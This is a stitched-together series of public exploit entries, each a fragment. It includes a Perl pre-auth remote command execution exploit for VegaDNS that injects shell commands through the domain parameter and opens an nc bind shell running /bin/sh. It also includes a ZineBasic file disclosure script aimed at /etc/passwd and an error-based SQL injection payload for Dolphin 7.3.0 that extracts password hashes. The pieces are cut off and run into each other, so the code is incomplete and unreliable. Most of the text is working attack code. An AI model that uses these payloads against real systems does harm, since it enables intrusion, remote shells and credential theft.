▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓
▓▓▓ ▐▓█ ▀▓▌ ▓▓▓
█▓▌ ▓▀ ▌ ▀▓ ▐▓▓
▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀
█ ▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓
▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄
▓▓ █▀▀ ▀█▀ ▀▓
▓▓ ▄ ▄▀ ▄ ▄ ▓▓
▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓
████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████
▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄
▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓
▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓
█▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█
▀ ▀▀
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
██████╗ ██████╗ ███████╗███████╗████████╗███████╗
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝
██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝
╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
█████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗
██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝
███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗
██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║
██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk
#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
=> Vulnerable snippet: $id = $_GET['id'];
----------------------------------------------------------------------------------
Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
2. Proof of Concept
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
which is rendered as:
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
3. Solution:
Update to version 7.3.1